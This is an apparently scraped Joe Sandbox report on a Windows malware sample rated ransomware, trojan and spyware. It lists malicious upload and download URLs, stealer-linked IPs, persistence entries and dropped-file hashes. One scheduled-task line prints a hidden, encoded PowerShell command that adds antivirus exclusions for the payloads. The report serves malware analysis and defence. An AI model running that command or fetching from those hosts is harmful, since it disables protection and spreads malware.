http://tempuri.org/Entity/Id3Responsex	RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://thizx13vt.top/v1/upload.php%qN	3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://aka.ms/nativeaot-compatibilityY	meta[1].exe.11.dr	false		unknown
http://thizx13vt.top/v1/upload.phpsrJG	3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://pastebin.com	winmsbt.exe, 00000021.00000002.4712142699.0000000003234000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000032F2000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.0000000003411000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000325F000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000331B000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000320A000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000336A000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.0000000003289000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id12Responsex	RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id17Responsex	RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id5Response	RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/2048ca.crl0	GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/nativeaot-compatibilityh	meta.exe, 00000027.00000002.3872094991.00007FF617E51000.00000004.00000001.01000000.00000013.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id10Response	RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id8Response	RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.dropbox.com/scl/fi/rqsnrl6msilfirz1qp1pn/weetwegsdg.exe?rlkey=rmj9i20g87wwdvd6wsdaypie2&	Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id24LRjq	RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.216.214.225/freedom.exe-	Cerker.exe, 00000022.00000002.4622434555.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ip.s	InstallUtil.exe, 00000032.00000002.3758938143.000000000333A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.dropbox.com/S	Cerker.exe, 0000001C.00000002.4613814551.0000000001198000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.dropbox.com/K	Cerker.exe, 0000001C.00000003.4059843797.0000000001215000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id22Responsex	RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id19Responsex	RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id2LRjq	RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse	RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://thizx13vt.top/:F	3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id20LRjq	RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id14LRjq	RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id13Response	RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.dropbox.com/r	Cerker.exe, 0000001C.00000002.4613814551.0000000001215000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/ts1ca.crl0	GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty	RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement	RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://direct-link.net/1218649/windows-latest-updates	winmsbt.exe, 00000021.00000002.4712142699.0000000003289000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://thizx13vt.top/2	3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://thizx13vt.top/)	3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://aia.entrust.net/ts1-chain256.cer01	GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	false	URL Reputation: safe	unknown
https://www.dropbox.com/(e	Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id22Response	RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://thizx13vt.top/E	3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.216.214.225/freedom.exej	Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://thizx13vt.top/F	3546345.exe, 00000025.00000002.4775940501.0000000002441000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.216.214.225/freedom.exeryWt.exe	Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id13Responsex	RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id16Responsex	RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id23LRjqp	RegAsm.exe, 0000002E.00000002.4755857564.0000000002F93000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://thizx13vt.top/S	3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id18Response	RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.216.214.225/	Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://thizx13vt.top/N	3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id3Response	RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.4755857564.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm	RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.125.66.18	unknown	United States	19679	DROPBOXUS	false
185.215.113.26	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
185.215.113.19	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
103.130.147.211	unknown	Turkey	63859	MYREPUBLIC-AS-IDPTEkaMasRepublikID	false
45.200.149.147	unknown	Seychelles	328608	Africa-on-Cloud-ASZA	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
208.95.112.1	unknown	United States	53334	TUT-ASUS	false
95.179.163.21	unknown	Netherlands	20473	AS-CHOOPAUS	true
82.147.85.52	unknown	Russian Federation	31112	SIBTEL-ASRU	false
104.20.4.235	unknown	United States	13335	CLOUDFLARENETUS	false
185.216.214.225	unknown	Germany	205388	SERVERDISCOUNTERserverdiscountercomDE	false
193.176.158.185	unknown	unknown	207451	AGROSVITUA	true
188.114.96.3	unknown	European Union	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1502163
Start date and time:	2024-08-31 10:46:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	57
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	wfJfUGeGT3.exe renamed because original name is a hash value
Original Sample Name:	046ebd7e0f619f33de609ea3f126b0d3.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.expl.evad.winEXE@95/66@0/13
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 94% Number of executed functions: 72 Number of non-executed functions: 310
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Skipping network analysis since amount of network traffic is too extensive

Simulations

Behavior and APIs

Time	Type	Description
04:46:52	API Interceptor	1x Sleep call for process: wfJfUGeGT3.exe modified
04:47:32	API Interceptor	4265x Sleep call for process: Shipment.pif modified
04:48:59	API Interceptor	2531x Sleep call for process: Cerker.exe modified
04:49:07	API Interceptor	474x Sleep call for process: winmsbt.exe modified
04:49:19	API Interceptor	1x Sleep call for process: IIZS2TRqf69aZbLAX3cf3edn.exe modified
04:49:54	API Interceptor	43x Sleep call for process: 3546345.exe modified
10:46:57	Task Scheduler	Run new task: Statistics path: wscript s>//B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js"
10:46:57	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url
10:48:57	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
10:48:59	Task Scheduler	Run new task: Cerker.exe path: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
10:49:06	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
10:49:15	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Subsystem Framework "C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
10:49:32	Task Scheduler	Run new task: Hkbsse path: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
10:49:38	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Subsystem Framework "C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
10:49:39	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
10:49:58	Task Scheduler	Run new task: mivyiofv path: powershell.exe s>-ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABOAGUAeAB0AFMAaQBuAGsAXABFAG4AYwBvAGQAaQBuAGcALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAIAAtAEYAbwByAGMAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATgBlAHgAdABTAGkAbgBrAFwARQBuAGMAbwBkAGkAbgBnAC4AZQB4AGUA
10:50:10	Task Scheduler	Run new task: Encoding path: C:\Users\user\AppData\Roaming\NextSink\Encoding.exe
10:51:32	Task Scheduler	Run new task: Windows path: C:\Users\user\Windows.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
162.125.66.18	https://www.dropbox.com/scl/fi/op070xas0eh2p222upauu/Document-1.docx?rlkey=lrjcxds4fso3d5dmmlv1itair&st=c1fl3n2k&dl=0	Get hash	malicious	HTMLPhisher	Browse
	GMP Architecture MailBox System shared _PROPOSAL REQUEST PORTAL_ with you.eml	Get hash	malicious	Unknown	Browse
	https://www.dropbox.com/scl/fi/divczsjhc8wrt1wb18r2b/AT-Society-Directory.docx?rlkey=sjkzm3g8jkcekmsxm460sja78&st=r52leq64&dl=0	Get hash	malicious	HTMLPhisher, ReCaptcha Phish	Browse
	https://www.dropbox.com/l/scl/AAC7hFTuscUDDY6M1jF4WYmjaGusJYsDNvY	Get hash	malicious	Unknown	Browse
	https://www.dropbox.com/l/scl/AAB-caRhWqrML98bRdmDd16YpJdQGQoNwfM	Get hash	malicious	Unknown	Browse
	https://dl.dropboxusercontent.com/scl/fi/4owe58ovn1ed21kp09mar/Rechnung-201528807699-vom-30.07.2024.zip?	Get hash	malicious	Unknown	Browse
	https://www.dropbox.com/l/scl/AAC7bZ0VQI_UDvxV34o89OGVuGeoyGILFFw	Get hash	malicious	Unknown	Browse
	+10618189554_VM_Mbda-usVM.mp3.pdf	Get hash	malicious	Unknown	Browse
	XCc5WuJdF7.exe	Get hash	malicious	Zhark RAT	Browse
	XCc5WuJdF7.exe	Get hash	malicious	Zhark RAT	Browse
185.215.113.26	Original_Build.exe	Get hash	malicious	Raccoon Stealer v2	Browse	185.215.113.26/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
185.215.113.19	SecuriteInfo.com.Win32.TrojanX-gen.17156.10149.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	SecuriteInfo.com.Win32.TrojanX-gen.11211.15058.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.19/Vi9leo/index.php
	SecuriteInfo.com.Win32.TrojanX-gen.15994.16518.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	SecuriteInfo.com.Win32.TrojanX-gen.17122.16457.exe	Get hash	malicious	Amadey, PureLog Stealer, Stealc	Browse	185.215.113.19/Vi9leo/index.php
	SecuriteInfo.com.Win32.TrojanX-gen.4650.358.exe	Get hash	malicious	Amadey, PureLog Stealer, Stealc	Browse	185.215.113.19/Vi9leo/index.php
	SecuriteInfo.com.Win32.TrojanX-gen.20423.9863.exe	Get hash	malicious	Amadey, PureLog Stealer, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	SecuriteInfo.com.Win32.TrojanX-gen.8387.16538.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	herso.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DROPBOXUS	https://www.dropbox.com/scl/fi/op070xas0eh2p222upauu/Document-1.docx?rlkey=lrjcxds4fso3d5dmmlv1itair&st=c1fl3n2k&dl=0	Get hash	malicious	HTMLPhisher	Browse	162.125.66.18
	GMP Architecture MailBox System shared _PROPOSAL REQUEST PORTAL_ with you.eml	Get hash	malicious	Unknown	Browse	162.125.1.20
	https://www.dropbox.com/scl/fi/divczsjhc8wrt1wb18r2b/AT-Society-Directory.docx?rlkey=sjkzm3g8jkcekmsxm460sja78&st=r52leq64&dl=0	Get hash	malicious	HTMLPhisher, ReCaptcha Phish	Browse	162.125.1.20
	https://www.dropbox.com/l/scl/AAC7hFTuscUDDY6M1jF4WYmjaGusJYsDNvY	Get hash	malicious	Unknown	Browse	162.125.21.1
	https://www.dropbox.com/l/scl/AAB-caRhWqrML98bRdmDd16YpJdQGQoNwfM	Get hash	malicious	Unknown	Browse	162.125.66.18
	https://dl.dropboxusercontent.com/scl/fi/i2zpknhy9u07fnzd16odr/Rechnungsnummer-DE230012940.zip?rlkey=so2rxiz6wbdl8wq5j881wuadq&st=f0ckmecz&dl=0	Get hash	malicious	Unknown	Browse	162.125.66.15
	https://dl.dropboxusercontent.com/scl/fi/4owe58ovn1ed21kp09mar/Rechnung-201528807699-vom-30.07.2024.zip?	Get hash	malicious	Unknown	Browse	162.125.66.15
	https://www.dropbox.com/l/scl/AAC7bZ0VQI_UDvxV34o89OGVuGeoyGILFFw	Get hash	malicious	Unknown	Browse	162.125.66.18
	+10618189554_VM_Mbda-usVM.mp3.pdf	Get hash	malicious	Unknown	Browse	162.125.21.1
	https://www.dropbox.com/l/scl/AADWaUTlzWcQZNBoJk7yo7JJzYq9pSy0xLY	Get hash	malicious	Unknown	Browse	162.125.6.18
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
MYREPUBLIC-AS-IDPTEkaMasRepublikID	http://findmy-help-lcloud.com/DpW/	Get hash	malicious	Unknown	Browse	103.130.147.57
	jew.arm.elf	Get hash	malicious	Unknown	Browse	158.140.174.217
	BitTorrent-7.6.exe	Get hash	malicious	Unknown	Browse	158.140.171.55
	3igeJkzboL.elf	Get hash	malicious	Mirai	Browse	103.130.144.204
	hesaphareketi-01.pdf.exe	Get hash	malicious	Vector Stealer	Browse	103.120.175.243
	hesaphareketi-01.pdf.exe	Get hash	malicious	Unknown	Browse	103.120.175.243
	DHL shipment arrival.exe	Get hash	malicious	AgentTesla	Browse	103.120.175.243
	Document 9404658918890577081119475750-pdf.exe	Get hash	malicious	AgentTesla	Browse	103.120.175.243
	DHL EXPRESS.exe	Get hash	malicious	AgentTesla	Browse	103.120.175.243
	Customer's Requirements and Pricing Details.exe	Get hash	malicious	AgentTesla	Browse	103.120.175.243
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	setup.exe	Get hash	malicious	XWorm	Browse
C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	SecuriteInfo.com.Win32.TrojanX-gen.2935.18945.exe	Get hash	malicious	Amadey, DarkTortilla, RedLine, XWorm	Browse
C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	ekBTbONX85.exe	Get hash	malicious	Xmrig	Browse
C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	file.exe	Get hash	malicious	Unknown	Browse
C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	file.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\3HvoFOAmEaJswFCHOzyfyz5b.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	23
Entropy (8bit):	3.82790978214397
Encrypted:	false
SSDEEP:	3:qIJMyAWRwo8n:q0CWRH8n
MD5:	0B7D0E3C4F447BCF36DCA919DFEF1607
SHA1:	17C3A0B1A4773EC4F168CDC24904B792FADC8F2E
SHA-256:	4F8F4E089917FBCCFC43593222BF9B17E43EDD9CD4BEF59B9152D4F8239C798D
SHA-512:	E6B37EB4F155A6F6F812721E97DB4CECDCBFEFE63C3F370E35D03CF20B858C08AAE82AFAD09043C55FF047A895827716D3003EE35A8C6D8B0724AB0CB4AC1B97
Malicious:	false
Preview:	Invalid request header.

C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.82790978214397
Encrypted:	false
SSDEEP:	3:qIJMyAWRwo8n:q0CWRH8n
MD5:	0B7D0E3C4F447BCF36DCA919DFEF1607
SHA1:	17C3A0B1A4773EC4F168CDC24904B792FADC8F2E
SHA-256:	4F8F4E089917FBCCFC43593222BF9B17E43EDD9CD4BEF59B9152D4F8239C798D
SHA-512:	E6B37EB4F155A6F6F812721E97DB4CECDCBFEFE63C3F370E35D03CF20B858C08AAE82AFAD09043C55FF047A895827716D3003EE35A8C6D8B0724AB0CB4AC1B97
Malicious:	false
Preview:	Invalid request header.

C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	675840
Entropy (8bit):	7.998216130139266
Encrypted:	true
SSDEEP:	12288:nQZ3hb7F0Rz5oquPojKv3rLMmVIhF2nde4S9MQfh0/Al2B4KtFejEqhPBBl0:G8zOFPOKzLM0k4dQf2B1E4q5Bs
MD5:	8083FED730E151BF47528621DB8E7FF8
SHA1:	4AB5E2EB5C6326FD68704CDC5A4F719D332F51A6
SHA-256:	AB0CA1D93238D0EFC02A41A7B311EFE3FC07C042F22D0608D33EA5313A667E55
SHA-512:	A36F22356558565A90107F3618D9D9AC8A20DA73616AA97A87D3EA41C8F444847A6BB56856FEAE87A1CA5C6CC748BF6CE1C43D5E348DD9EA80CDD3C3DBD0D47B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Joe Sandbox View:	Filename: ekBTbONX85.exe, Detection: malicious, Browse
